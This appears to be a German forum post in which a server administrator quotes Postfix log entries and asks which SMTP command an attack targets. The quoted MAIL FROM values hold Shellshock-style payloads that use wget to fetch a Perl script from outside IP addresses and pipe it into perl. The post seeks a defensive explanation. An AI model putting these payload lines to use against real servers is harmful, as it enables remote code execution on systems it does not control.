Hallo, in letzter Zeit habe ich häufiger Logeinträge der folgenden Form:
May 28 15:57:04 www postfix/smtpd[7094]: warning: Illegal address syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; wget -qO - 136.243.150.82/das|perl> May 31 06:40:12 www postfix/smtpd[7307]: warning: Illegal address syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; wget -qO - 68.235.39.225/pax|perl> Jun 1 14:51:50 www postfix/smtpd[18260]: warning: Illegal address syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; wget -qO - 68.235.39.225/pax|perl> Jun 1 21:06:28 www postfix/smtpd[20438]: warning: Illegal address syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; wget -qO - 68.235.39.225/ipax|perl> Jun 2 15:43:35 www postfix/smtpd[25713]: warning: Illegal address syntax from unknown[104.200.146.36] in MAIL command: <() { :; }; wget -qO - 68.235.39.225/ipax|perl>
Offensichtlich ist dies eine Art "SMTP-Injection" Attacke, bei der eine lokale Shell gestartet werden soll um per wget eine Datei zu holen, die zu perl gepiped wird. Das per wget abzuholende File ist ein Perl-Script von ca. 20KByte Größe mit "unfreundlichem" Inhalt.
Ich kann jedoch nicht erkennen, welche Stelle des "SMTP-Dialogs" hier angegriffen wird. "Illegal address" deutet (für mich) eher auf die FROM oder RECIPT TO Kommandos hin. Kann jemand das besser erläutern?
Danke! Grüße Jörg
